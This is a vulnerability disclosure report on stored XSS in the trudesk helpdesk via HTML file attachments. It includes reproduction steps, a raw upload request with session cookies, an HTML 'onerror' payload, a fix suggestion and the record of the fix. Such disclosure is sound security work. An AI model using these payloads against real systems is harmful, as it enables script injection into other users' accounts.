Least Privilege Violation in polonel/trudesk


Reported on

Jun 15th 2021


Stored XSS via file upload


Stored XSS allows executing arbitrary JavaScript in a victim's trudesk account. An external user can also get the XSS executed in an admin's account, as shown here.


1. First, as admin, go to http://localhost:8118/teams and create a team called team2.
Then go to http://localhost:8118/accounts/agents and add a new user called user B with the support role, and assign him to team2 created above.

2. Now, as an external user, go to http://localhost:8118/newissue and create a new ticket.

3. Now user B goes to his account, where he can see the public ticket created above.
User B can upload an attachment to this ticket.
User B can attach any file, including HTML, and an HTML file can execute JavaScript.
When uploading an HTML file, the request below is sent to the server:

POST /tickets/uploadattachment HTTP/1.1
Host: localhost:8118
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------34732645982285409509843513490
Content-Length: 409
Origin: http://localhost:8118
Connection: close
Referer: http://localhost:8118/tickets/1004
Cookie: PHPSESSID=n3ofevpn16pm9p45ngraltrbtk; SMFCookie600=a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A40%3A%220bf82305176bf11c423867c0f41a1f7944174f1e%22%3Bi%3A2%3Bi%3A1812778653%3Bi%3A3%3Bi%3A2%3B%7D; ElkArteCookie700=%5B1%2C%22b34b4193d3296f9b57616347174aaf58503bf2226225496e5a159745bea75aba%22%2C1812793345%2C2%5D; _csrf=X6SB4CbNToC6T0TuClv-MPqa; express.sid=s%3A5tJvaz7mQH_plOxJ0Qm39QiZ0gZ6hpQ2.J5ipJrnNm3tGCLsqbRWuvnbIJBLL9XC3vHMTg4DEHCo; $trudesk%3Atimezone=America/New_York; connect.sid=s%3APvO_kBBiQoJLhJ-OvfW6Zgv0zwLxrTD0.owzip3EbVPWPph8Ac2o7Al34KE5gNPk08e0eyd%2B%2Bze4; io=EzJ4Vn6dOVHG5S_8AAAJ; $trudesk%3Asidebar%3Aexpanded=false

Content-Disposition: form-data; name="ticketId"

Content-Disposition: form-data; name="attachment"; filename="exif.html"
Content-Type: text/html

xss"'><img src=x onerror=alert(document.domain)>

After uploading, a user can access the uploaded file at a URL like http://localhost:8118/uploads/tickets/60c632a56e8507002262a20a/attachment_exif.html.
If any user opens this file, the XSS is executed.


When serving an uploaded file, do not render it. You can use the Content-Disposition: attachment; filename="filename.html" header to prevent an HTML file from being rendered; the browser will then ask the user to download the file instead.


Chris validated this vulnerability 2 years ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Chris marked this as fixed with commit 25c5ae 2 years ago
Chris has been awarded the fix bounty
This vulnerability will not receive a CVE